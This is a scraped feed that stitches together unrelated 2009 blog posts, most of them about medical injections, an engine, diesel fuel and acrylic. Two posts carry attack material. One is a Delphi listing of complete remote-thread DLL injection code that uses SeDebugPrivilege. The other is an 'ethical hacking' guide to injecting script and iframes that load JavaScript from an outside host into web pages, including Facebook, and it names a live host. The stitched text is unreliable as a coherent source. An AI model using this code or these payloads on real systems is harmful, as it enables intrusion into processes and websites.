<description><![CDATA[Firstly I would like to say &#8220;Ow!&#8221; Secondly I would like to say &#8220;Ouch!&#8221; Third]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><a href="http://doctorbeatnik.wordpress.com/files/2009/11/fluvaccine.jpg"><img class="alignleft size-medium wp-image-975" title="PD*10352192" src="http://doctorbeatnik.wordpress.com/files/2009/11/fluvaccine.jpg?w=300" alt="" width="300" height="187" /></a>Firstly I would like to say &#8220;Ow!&#8221; Secondly I would like to say &#8220;Ouch!&#8221; Thirdly I would like to do some very offensive swearing. Yes, I had the swine flu vaccination yesterday afternoon and my arm now feels as though elephants have been punching it with their trunks whilst their trunks were curled around enormous tree trunks covered in nails.</p>
<p>There are other side-effects too. My chest  is apparently being sat upon by Fatty Arbuckle; my neck has been thrown down a very deep well shaft and is currently trying to crawl its way back up in order to get on with the job of preventing my head from being all floppy; there is a pain behind my left eye which hurts so much I am not entirely sure I haven&#8217;t been mistaken for a former king of England and stuck with a Norman arrow; and I feel close to tears over the slightest of things. Obviously I am almost entirely wrapped up in how dreadful I feel and wondering how long these effects will last, but there is a crumb of concern too for the others who were given the shot yesterday.</p>
<p>The letter from the doctor&#8217;s surgery said to come in any time between one and six in the afternoon. I thought I would be clever and get there pretty much at one and get it over and done with. Hmm, so clever that I had to join the queue along with some forty or fifty other folk. I have a &#8216;normal&#8217; flu jab every year and ordinarily there are maybe two or three other people waiting to have their arms stuck with a pin too. The surgery yesterday was standing room only. I did begin to wonder if most of those who arrived after me were either blind or terminably stupid as, despite clearly being able to see that there was lots of standing space within the room, and having seen that there were more and more people arriving after them, many of them came into the room and stood blocking the doorway. Way to go &#8211; let&#8217;s fray everyone&#8217;s nerves that little bit more by causing an obstruction, shall we?</p>
<p>I&#8217;m probably being harsh. I know I was nervous &#8211; my wife will testify to that as I was in &#8216;cheeky schoolboy&#8217; mode, the frame of mind in which I tend to act like a nine year old in public rather than the forty-something allegedly grown-up human I actually am. My mood was not helped by the inevitable chorus of frustrated moaning and the odd voice of misinformed doom and gloom: &#8220;I don&#8217;t even know why I&#8217;m bothering,&#8221; I heard one chap say to the person sitting next to him, &#8220;There&#8217;s already a new strain of the virus which is resistant to this vaccine anyway.&#8221; I love the way people spout such desperate &#8216;certainties&#8217; which are in fact entirely apocryphal, don&#8217;t you?</p>
<p>Every couple of minutes somebody&#8217;s name would flash up on the digital display board, accompanied by the sort of buzz that I previously assumed was a television sound effect. One woman&#8217;s name did not trigger a responding walk to the inner door, through which the two over-worked nurses could be found armed with stabby jabby utensils. A minute or so later that name disappeared and was replaced by someone else&#8217;s, someone who spotted they&#8217;d been called and went on in for their shot. Maybe five minutes after that a woman came through from reception where she&#8217;d presumably been chatting to a friend. A large smiley man told the newcomer that she&#8217;d missed her name on the board. &#8220;No I haven&#8217;t,&#8221; she replied. &#8220;Yes it came up a few minutes ago,&#8221; he insisted. &#8220;Rubbish, I&#8217;ve only just got here,&#8221; she said. Mrs Planet then tried to back the smiley man up and repeated the name that had been on the screen. The woman was having none of it. I wonder if she is still sat in the surgery this morning waiting for her name to come up?</p>
<p>When my name was finally called I walked through, rolled up my sleeve, said &#8220;Ow,&#8221; as quietly as possible, and that was that. It did hurt more than my seasonal jab has ever done but part of me wanted to believe that was because the nurses were working that little bit faster than usual in order to get through everyone, and were possibly a tiny bit less gentle than they could be. For the rest of the day I was a bit sore on that side but not too bad. And then I woke up in the middle of the night, having rolled over onto the jabbed side at some point, and was in agony. My arm was numb, my neck and eye had begun to hurt and that&#8217;s when I noticed how tight my chest had become. Which made me panic and thus tighten my chest even more. I could not get comfortable after that and ended up downstairs on the sofa trying to stay as upright as possible as it seemed the only position which eased the aches and pains a little. I intend to spend most of today catching up on the sleep I didn&#8217;t really manage to get last night.</p>
<p>And this is where my concern comes in. I am forty-something and obviously not the fittest of folk otherwise I would not need to worry about the swine flu vaccination in the first place. But I am obviously fitter than quite a few of the mostly elderly people who were also having their shot yesterday. So if I am feeling rotten and miserable today, how on earth are those guys feelings? I do hope they have people with them to help get them through the next day or two while their bodies adjust to having this new stuff pumping through their immune system. And I hope they&#8217;ve chosen more uplifting reading material to while away the day. I had already begun to read &#8216;Hard Times&#8217; by Charles Dickens. Well done, Planet Boy, forward thinking there. Oh well, at least it isn&#8217;t &#8216;Love in the Time of Cholera&#8217;.</p>

<content:encoded><![CDATA[<div class='snap_preview'><p>Hyundai has unveiled its first ever petrol-powered direct injection engine.</p>

<p><img src="http://www.caradvice.com.au/wp-content/uploads/2009/11/2_0-liter-theta-turbocharged-gdi-four-cylinder-engine-580x480.jpg" alt="Hyundai unveils its first direct-injection petrol engine" /></p>
</p>
<p> Known as the Theta II GDI, the 2.4-litre 4-cylinder unit is the product of 46 months of research and development and expenses of more than 170 billion won (AUD$160 million).</p>
<p> The ideology for the new engine was simple: lower emissions, raise power output, improve fuel economy.</p>
<p> And Hyundai Australia sales and marketing director, Kevin McCann, is impressed with the final result.</p>
<p> “The Theta II GDI convincingly demonstrates our parent company&#8217;s advanced powertrain engineering capabilities,” he said.</p>
<p> With a compression ratio of 11.3:1, the new engine delivers 150kW at 6300rpm and 245Nm at 4250rpm.</p>
<p> A mechanism allowing the catalytic converter to reach its optimum working temperature faster reduces emissions from cold starts by 25 per cent.</p>
<p>

</p>
<p> The Dual Continuously Variable Value Timing (DCVVT) of the split-injection system also lowers emissions and increases power.</p>
<p> Hyundai will debut the Theta II in the first half of 2010 in the all-new mid-sized sedan codenamed YF – the vehicle expected to replace the current Sonata – before being expanded into other models.</p>

<content:encoded><![CDATA[<div class='snap_preview'><p>Been at the dentist this morning.  Booked in to have 2 small fillings on the top and 1 larger filling (to replace an old one at the bottom).  I haven&#8217;t had much tooth ache but the bottom one is especially sensitive to hot / cold and needed to be looked at.</p>
<p>On further inspection I needed 2 fillings at the bottom, which the dentist descibed one as &#8221; a massive cavity&#8221; Blimey!  So, 3 injections later my whole mouth, chin, lips and nose is now numb&#8230;. It turns out that the old filling was hiding a big hole underneath and this mornings investigation ended up being a full on deep drill right to the nerve.  At some point, could be 6 days, 6 months or 6 years it&#8217;s going to need a root canal.  Brilliant.</p>
<p>Much flossing and brushing is needed for the future of my teeth, but for now I&#8217;m just a little bit dribbly and slury &#8211; for the next 4 to 6 hours.</p>

<content:encoded><![CDATA[<div class='snap_preview'><p>I had to go for my injection today. Every twelve weeks the same routine. Down to my local health centre to see the nurse, who warms the precious phial before injecting its contents slowly* into my buttock. Perhaps you wince at the image but it has long since become as ordinary to me as praying five times a day is to a devout Muslim – and, let&#8217;s face it, compared to five times a day, once every twelve weeks isn&#8217;t onerous.</p>
<p>The injection used to be required more frequently  – once every three weeks – and in those days i used to do it myself at home. This had the advantage of autonomy. I didn’t have to depend on someone else or worry about getting through on the (perpetually jammed) health centre appointment line. On the other hand, it was also nerve-wracking. I never came fully to terms with sticking a needle into my body – it wasn’t the pain, of which there’s very little due to the lack of nerve endings in that part of your body; but more an anxiety, an awareness that if something did go drastically wrong there would be nobody there to help me.</p>
<p>It was also lonely. As a trans man i get by in the world via a mixture of bravado and silence; yet inevitably there are times when i become anxious or depressed. One of the things i appreciated when i switched medications and had to return to attending the health centre for my injection was the chance to chat with the nurse. It’s funny: on the one hand i resent the way in which transitioning has permanently medicalised my life, but on the other i quite enjoy the attention. Nurses, especially the ones attached to health centres, are almost always a joy to talk to. There’s something about the job of nursing which self-selects the most positive, practical and pragmatic individuals; and just being in the company of such people is uplifting.</p>
<p>My nurse today was called A. It was the first time I’d had an appointment with her and I had thought from her name that she might be from francophone Africa. As it turned out she is indeed African, but South African – an Afrikaner to be exact &#8211; with a lovely, lilting accent which blew all my assumptions about Afrikaans-speakers (harsh, guttural, etc) out of the water. Accents aside, what struck me about A was her warmth, energy and good humour. You would think working at a busy health centre would reduce even the most dedicated nurse to a drone but not so; she was the most enthusiastic person i’ve met in a good while.</p>
<p>After just ten minutes the injection was over and done with and i was on my way to work. The leg on the side where i’d been injected was aching slightly as usual but my tolerance for the rest of the human race was much improved. One person speaking to you kindly, smiling at you when they greet you, asking you how you feel: these things really do make a difference.</p>
<p><em>* Over a period of one minute to be exact. Apparently, if it goes in too fast it can cause an asthma attack.</em></p>

<description><![CDATA[A Cetane number is a measure of the fuel&#8217;s ignition delay, which is the time between the start]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>A Cetane number is a measure of the fuel&#8217;s ignition delay, which is the time between the start of injection and the start of combustion (ignition) of the fuel. In a particular diesel engine, higher Cetane fuels will have shorter ignition delay periods than lower Cetane fuels. Cetane numbers are only used for the relatively light distillate diesel oils. For heavy (residual) fuel oil two other scales are used CCAI and CII.</p>
<p>Generally, diesel engines run on a Cetane number from 40 to 55. Fuels with higher Cetane number, have shorter ignition delays, and provide more time for the fuel combustion process to be completed. Hence, higher speed diesels operate more effectively with higher Cetane number fuels. There is no performance or emission advantage when the Cetane number is raised past approximately 55. After that point, the fuel&#8217;s performance hits a plateau.</p>
<p>Most states adopt ASTM D975 as their diesel fuel standard and the minimum Cetane number is set at 40, with typical values in the 42-45 range. Premium diesels may or may not have higher Cetane, depending on the supplier. Premium diesels often use additives to improve Cetane number.</p>

<description><![CDATA[When I first realized I was abused as a child I did not tell anyone. I kept it secret from my family]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>When I first realized I was abused as a child I did not tell anyone. I kept it secret from my family, friends and myself. I thought that maybe if I just do not acknowledge the idea that it will just go away. I tried that for while, I did everything left my house, distracted myself, self-harm and then finally suicide. This is when I ended up at a general psych unit for the first time.</p>
<p>I was having bad nightmares, flashbacks about it at first. I had no idea what they were, but everyone else around me knew. I worked with a MSW individually while on the unit, because I would not talk to anyone.</p>
<p>After a few days the therapist said, <em>“Do you see how bad something wants to come out, just let it out, it’s ok”.</em></p>
<p>Sometimes words just cannot explain. I did not actually verbalize the words “I was abused” but I just said mangled words that somehow formed a sentence. After that, treatment team said that I should tell my parents. I trusted the therapists’ words so I said okay. The day before the meeting with my parents, I felt like I was being backed into a corner. I freaked out.</p>
<p> After I woke up from my IM induced nap, I was on 1:1. I told the MSW that I could not tell them. She asked me if she could tell them without me in the room, and I said okay.  </p>
<p>The next time I saw my parents they acted like everything was perfect, there was no talking about anything. I was so hurt by that, they just learned I was abused and they acted, as it was never said. That is when I knew that nothing was okay.</p>
<p>My family says that they did not like the way in which I told my secret to them. They said I told them the “wrong way” because it did not come out of my mouth. My mother said that I could have picked a more “mature” way to tell them.</p>
<p>For a long time, I felt bad about having the MSW tell them. However, I do not think any way I could have chosen would have been the “right way” in their eyes. I told them the only way I could. I could not even tell myself so how could I tell anyone else.</p>
<p>I think that telling my secret has changed my life. Nevertheless, I know it changed my families’ life. I was no longer following the rules. I was now the <em>black sheep</em>.</p>

<content:encoded><![CDATA[<div class='snap_preview'><p>Good news!</p>
<p><a href="http://romancingthestone.wordpress.com/files/2009/11/blog-a-wonder_woman.jpg"><img class="alignleft size-medium wp-image-324" title="blog a wonder_woman" src="http://romancingthestone.wordpress.com/files/2009/11/blog-a-wonder_woman.jpg?w=204" alt="blog a wonder_woman" width="204" height="300" /></a></p>
<p>We had our first girl-power mixer for the <a href="http://www.meetup.com/rubyfeather-boston/" target="_blank">RubyFeather Social Club</a> last night and it was AWESOME. I never met so many  women who I would totally love to be friends with. It was wonderful to hear the stories of others and share strengths and support. I believe that everyone left energized and hopeful, really feeling this if they had sisters on the journey toward motherhood.</p>
<p>In addition to that I can proudly say I DID IT!  I gave myself the menopur shot this morning. Yes, I was still sweating and a little nervous, but I played some Joss Stone tunes and did a little power dance before I plunged the needle in my belly. Hooyah! I can&#8217;t believe it, but I felt EMPOWERED! I had control over something for once. I think I am going to take the syringe away from my husband, and do it myself more often.</p>
<p>On a funny note, the Bear left me the HCG needle instead of my teenie 30 gauge one. I was mixing the solution and getting ready to add the needle when I thought- Cruel joke! What was he trying to do? Kill me???? Once I found an appropriate sharp (a wee dwarf of the HCG needle,) it seemed like child&#8217;s play.</p>
<p>A big thank you and cyber hug to everyone who has left me a comment. IT&#8217;S HELPING!!!!!</p>
<p>Go ladies go! Let&#8217;s make some cute babies around here!</p>

Ex:no delphi o fim do código seria</p>
<blockquote><p>exports<br />
FazerExitProcess;
</p></blockquote>
<blockquote><p>type<br />
TInjectParams = record<br />
LoadLibrary: function (lpLibFileName: PAnsiChar): Cardinal; stdcall;<br />
LibName: PAnsiChar;<br />
GetProcAddress: function (hModule: Cardinal; lpProcName: PAnsiChar): Pointer; stdcall;<br />
ProcName: PAnsiChar;<br />
end;<br />
PInjectParams = ^TInjectParams;
</p></blockquote>
<blockquote><p>function GetProcess(proc: string): Cardinal;<br />
var<br />
Snap: THandle;<br />
pe: TProcessEntry32;<br />
begin<br />
Snap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);<br />
if Snap = 0 then Exit;<br />
if Process32First(Snap,pe) then<br />
begin<br />
repeat<br />
if proc = pe.szExeFile then<br />
begin<br />
Result:=pe.th32ProcessID;<br />
break;<br />
end;<br />
until not Process32Next(Snap,pe)<br />
end<br />
end;
</p></blockquote>
<blockquote><p>function WriteString(Process: Cardinal; s: string): Pointer;<br />
var<br />
bytes: Cardinal;<br />
begin<br />
Result:=VirtualAllocEx(Process, nil, length(s) + 1, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br />
WriteProcessMemory(Process, Result , pchar(s), length(s) + 1, bytes);<br />
end;<br />
function WriteData(Process, dwSize: Cardinal; RemoteData: pointer): pointer;<br />
var<br />
bytes: Cardinal;<br />
begin<br />
Result:=VirtualAllocEx(Process, nil, dwSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br />
WriteProcessMemory(Process, Result, RemoteData, dwSize, bytes);<br />
end;
</p></blockquote>
<blockquote><p>procedure RemoteFunction(Parametros: PInjectParams); stdcall;<br />
var<br />
proc: procedure; stdcall;<br />
begin<br />
proc:=Parametros^.GetProcAddress(Parametros^.LoadLibrary(Parametros^.LibName),Parametros^.ProcName);<br />
proc;<br />
end;
</p></blockquote>
<blockquote><p>procedure RemoteFunctionEnd; stdcall;<br />
begin;<br />
end;
</p></blockquote>
<blockquote><p>procedure ChangePrivilege(szPrivilege: PChar; fEnable: Boolean);<br />
var<br />
NewState: TTokenPrivileges;<br />
luid: TLargeInteger;<br />
hToken: THandle;<br />
ReturnLength: DWord;<br />
begin<br />
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken);<br />
LookupPrivilegeValue(nil, szPrivilege, luid);</p>
<p>NewState.PrivilegeCount := 1;<br />
NewState.Privileges[0].Luid := luid;<br />
if (fEnable) then<br />
NewState.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED<br />
else<br />
NewState.Privileges[0].Attributes := 0;</p>
<p>AdjustTokenPrivileges(hToken, False, NewState, SizeOf(NewState), nil, ReturnLength);<br />
CloseHandle(hToken);<br />
end;
</p></blockquote>
<blockquote><p>pprocedure Inject(process, dll, code: string);<br />
var<br />
PID, hProcess, ThreadId, ThreadHandle: Cardinal;<br />
RemoteData,RemoteFunc,LibFileName,ProcName: pointer;<br />
Parametros: TInjectParams;<br />
begin<br />
//Pega o Handle do processo<br />
PID:=GetProcess(Process);<br />
//Seta o privilégio de debug<br />
ChangePrivilege(’SeDebugPrivilege’, True);</p>
<p>//Abre o processo<br />
hProcess := OpenProcess(PROCESS_ALL_ACCESS, False, PID);</p>
LibFileName:=WriteString(hProcess, dll);<br />
ProcName:=WriteString(hProcess, code);<br />
Parametros.LoadLibrary:=GetProcAddress(GetModuleHandle(’kernel32′), ‘LoadLibraryA’);<br />
Parametros.LibName:=LibFileName;<br />
Parametros.GetProcAddress:=GetProcAddress(GetModuleHandle(’kernel32′), ‘GetProcAddress’);<br />
Parametros.ProcName:=ProcName;</p>
RemoteData:=WriteData(hProcess, sizeof(Parametros), @Parametros);</p>
RemoteFunc:=WriteData(hProcess, integer(@RemoteFunctionEnd) – integer(@RemoteFunction), @RemoteFunction);</p>
<p>//Cria a thread que executará a procedure<br />
ThreadHandle:=CreateRemoteThread(hProcess, nil, 0, RemoteFunc, RemoteData, 0, ThreadId);<br />
WaitForSingleObject(ThreadHandle, 3000);</p>
<p>//Libera as alocações de memórias criadas<br />
VirtualFreeEx(hProcess,LibFileName,0,MEM_RELEASE);<br />
VirtualFreeEx(hProcess,ProcName,0,MEM_RELEASE);<br />
VirtualFreeEx(hProcess,RemoteFunc,0,MEM_RELEASE);<br />
VirtualFreeEx(hProcess,RemoteData,0,MEM_RELEASE);<br />
end;
</p></blockquote>
<blockquote><p>library testdll;<br />
uses<br />
Windows,<br />
SysUtils,<br />
Classes;</p>
<p>{$R *.res}</p>
<p>procedure MsgBox;<br />
begin<br />
MessageBox(0,’Funcionou’,&#8217;Code Injection bem sucedido’,MB_OK+MB_ICONINFORMATION);<br />
end;<br />
exports<br />
MsgBox;<br />
begin<br />
end.
</p></blockquote>
<blockquote><p>Inject(&#8216;notepad.exe&#8217;,'C:\Dev\CodeInjection\testdll\testdll.dll&#8217;,'MsgBox&#8217;);
</p></blockquote>

<description><![CDATA[Hello everyone, Today I&#8217;m going to teach you how to ethically hack a website. The basic idea b]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Hello everyone,</p>
<p>Today I&#8217;m going to teach you how to ethically hack a website. The basic idea behind this is the use of IFrames. This is how to ethically hack a website using IFrame Injection 1. You must get the following code some how (by using toolbar to inject and forcefully write it into the code or some) into the website:-</p>
<pre class="brush: xml; html-script: true;">&#38;amp;amp;lt;script src='http://yourwebsite/hacking/iframeinject/js1.js'&#38;amp;amp;gt;&#38;amp;amp;lt;/script&#38;amp;amp;gt;
</pre>
<p>Then the next step is to programming this JavaScript file. Type the code as follows (this is not needed to be typed into a file! you can directly run this in the browser! check below):-</p>
<pre class="brush: jscript;">

// Script for hack start, this code is meant for ethical hacking and is retreived from http://ethicalhacking2009.wordpress.com/

var iframehack = &#38;amp;amp;quot;&#38;amp;amp;lt;iframe src='http://yourwebsite/hacking/iframeinject/html1.html'&#38;amp;amp;gt;&#38;amp;amp;lt;/iframe&#38;amp;amp;gt;&#38;amp;amp;quot;;

document.body.innerHTML += iframehack; // or // document.write(iframehack);

// Script end for hack
</pre>
<p>The next step is to programing the HTML file:-</p>
<pre class="brush: plain; html-script: true;">
&#38;amp;amp;lt;script src=&#38;amp;amp;quot;http://yourwebsite/ehack/inframeinject/js1.js&#38;amp;amp;quot;&#38;amp;amp;gt;&#38;amp;amp;lt;/script&#38;amp;amp;gt;
&#38;amp;amp;lt;input type=&#38;amp;amp;quot;text&#38;amp;amp;quot; id=&#38;amp;amp;quot;txt&#38;amp;amp;quot; value=&#38;amp;amp;quot;alert(window.parent.document.title); // Gets title of the window outside&#38;amp;amp;quot;&#38;amp;amp;gt;
&#38;amp;amp;lt;br /&#38;amp;amp;gt;&#38;amp;amp;lt;br /&#38;amp;amp;gt;
&#38;amp;amp;lt;button onclick=&#38;amp;amp;quot;exec();&#38;amp;amp;quot;&#38;amp;amp;gt;Try out&#38;amp;amp;lt;/button&#38;amp;amp;gt;
</pre>
<p>The next step is to program the JavaScript file linked to the HTML file:-</p>
<pre class="brush: jscript;">

// Script for hack start, this code is meant for ethical hacking and is retreived from http://ethicalhacking2009.wordpress.com/

function geTitle() { alert(window.parent.document.title); }

function exec()    { eval(document.getElementById(&#38;amp;amp;quot;txt&#38;amp;amp;quot;).value); }

// Script end for hack
</pre>
<p>This will now show that the website is hacked and there is no easy way to remove the hack other than rolling back the way to did it!</p>
<p>This injection can also be used to run the same on Chrome as well as Mozilla Firefox! To run javascript commands on a page in Chrome or Mozilla Firefox you must type &#8220;<strong>javascript:<em>&#60;command&#62;</em><span style="font-weight:normal;">&#8221; and the same command will be executed in the page on the browser!</span></strong></p>
<p><strong><span style="font-weight:normal;">First goto &#8220;<a href="http://www.dotpdn.com/downloads/pdn.html">http://www.dotpdn.com/downloads/pdn.html</a>&#8221; and do nothing. You have to type the following commands in the address bar in the browser on the page where the link is opened:-</span></strong></p>
<p><strong><span style="font-weight:normal;">1&#62;<span style="font-family:Consolas, Monaco, 'Courier New', Courier, monospace;line-height:18px;font-size:12px;white-space:pre;"> </span></span></strong></p>
<p><strong> </strong></p>
<p><strong>
<pre class="brush: jscript;">javascript:var iframehack = &#38;amp;amp;quot;&#38;amp;amp;lt;iframe src='http://yourwebsite/hacking/iframeinject/html1.html'&#38;amp;amp;gt;&#38;amp;amp;lt;/iframe&#38;amp;amp;gt;&#38;amp;amp;quot;;</pre>
<p></strong></p>
<p>&#160;</p>
<p>2&#62;<span style="font-family:Consolas, Monaco, 'Courier New', Courier, monospace;line-height:18px;font-size:12px;white-space:pre;"> </span></p>
<pre class="brush: jscript;">javascript:document.body.innerHTML += iframehack;</pre>
<p>Done! Your work is done! The page will load again and the page will have an hidden IFrame! This IFrame will fetch data from your website and then run the hack.</p>
<p>Please NOTE: this hack does also work on Facebook pages!</p>
<p>Live example is there using &#8220;<strong>http://www.surfpops.com/ehack/inframeinject/html1.html</strong>&#8221; and &#8220;<strong>http://www.surfpops.com/ehack/inframeinject/js1.js</strong>&#8220;. The following code and be used to use the links above:-</p>
<p>1&#62;<span style="font-family:Consolas, Monaco, 'Courier New', Courier, monospace;line-height:18px;font-size:12px;white-space:pre;"> </span></p>
<pre class="brush: jscript;">javascript:var iframehack = &#38;amp;amp;quot;&#38;amp;amp;lt;iframe src='http://www.surfpops.com/ehack/inframeinject/html1.html'&#38;amp;amp;gt;&#38;amp;amp;lt;/iframe&#38;amp;amp;gt;&#38;amp;amp;quot;;</pre>
<p>2&#62;<span style="font-family:Consolas, Monaco, 'Courier New', Courier, monospace;line-height:18px;font-size:12px;white-space:pre;"> </span></p>
<pre class="brush: jscript;">javascript:document.body.innerHTML += iframehack;</pre>
<p>Done! Now your real hack is working! <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Hack DOESN&#8217;T WORK IN CHROME! Chrome has high tight security thus we cannot use this hack in Chrome due to blockage of the property &#8220;window.parent&#8221; from the IFrame!</p>
<p>Thanks,</p>

<content:encoded><![CDATA[<div class='snap_preview'><p>Acrylic is the kind of polymer which has been taken from monomer methyl methacrylate. It absolutely was created more than only seventeen years age. The operate of this material includes impact resistance, soften flow, color ability, and controlled characteristics. Acrylic graded possesses a co monomer that is mixed up at the season of polymerization to facilitate flow for injection plus extrusion. Here graded are formulated to perform the task of heat resistance plus high impact strength. These days, acrylic is used in health care plus medical applications because of its processed and assembled nature.<br />All retail products in addition to acrylic, which is the ideal choice keeper for the search. As a pure acrylic product of these products are used in what is classified as a solid majority to use the appearance of a variety of purposes. Acrylic has become the ideal on the market choice of every one store keepers. This is as pure acrylic emulsions are recognized because the most durable for exterior use. As we be familiar with that acrylic emulsion polymers owe their great sturdiness to their high molecular weight and the truth that they do not crosslink because of their chemical nature.<br />The use of acrylic in the medical field, for curettes plus hose connectors, it is also used to check syringes, blood filters, to Kits, lures, flow meters, blood pumps, fluid, silos, housing, surgical blades, surgical trays, incubators drainage and create magic wands.<br />Acrylic provided by the manufacturer of the major commodities in different industries around the world.
<content:encoded><![CDATA[<div class='snap_preview'><p><img class="alignnone size-full wp-image-3887" title="Swine Flu Mortality" src="http://les7duquebec.wordpress.com/files/2009/11/michc3a6l-paukner-httpwww-flickr-comphotosmichaelpaukner.jpg" alt="Swine Flu Mortality" width="449" height="634" /></p>

<description><![CDATA[A second dose of Cimzia (certolizumab pegol) was injected Wednesday evening. Since Enbrel was no lon]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p style="text-align:left;">A second dose of Cimzia (certolizumab pegol) was injected Wednesday evening. Since Enbrel was no longer working well, my rheumatologist recommended trying a new medication. Cimzia, which was recently approved by the FDA, is designed to stay in the body longer thereby making it more effective. The nurse stated that about 15-20 patients in their office switched to Cimzia after Enbrel and Humira stopped working for them.</p>
<p style="text-align:left;">Below is a photo showing all the paraphernalia associated with self-administration of the antibody treatment. I do &#8220;enjoy&#8221; the ergonomically designed syringes!</p>
<p><a href="http://livingwithra.wordpress.com/files/2009/11/cimzia.jpg"><img class="alignnone size-medium wp-image-185" title="cimzia" src="http://livingwithra.wordpress.com/files/2009/11/cimzia.jpg?w=300" alt="cimzia" width="300" height="225" /></a></p>
<p>I noticed less fatigue last month after the first injection although joint pain and inflammation continued. The first clear evidence of finger joint bending was noticable. My knee was bothering me after swimming a little (so much for swimming as a good exercise for RA). The fatigue returned over the past few days. Since swine flu made a visit to our house last week (my son had it), I debated whether I should wait to take the second dose. Cimzia lowers the immune system increasing vulnerability to infections. We were still in the incubation period for the flu. But I realized that the toll of RA on my body trumped anything else and I gave myself the second injection. The day after the 2nd injection brought an obvious increase in energy, less &#8220;brain fog&#8221;, and less joint stiffness and pain.</p>
<p>My rheumy said to give it a good 3-4 months before making any long-term judgements about the efficacy of Cimzia.  Since the pain was still present and finger bending noticeable, my rheumy suggested that I try Mobic (meloxicam) which is a non-steroidal anti-inflammatory (NSAID). I can&#8217;t tolerate ibuprofen so we&#8217;ll see how this goes. Thus, another weapon is added to the chemical arsenal designed to fight RA in my body.</p>
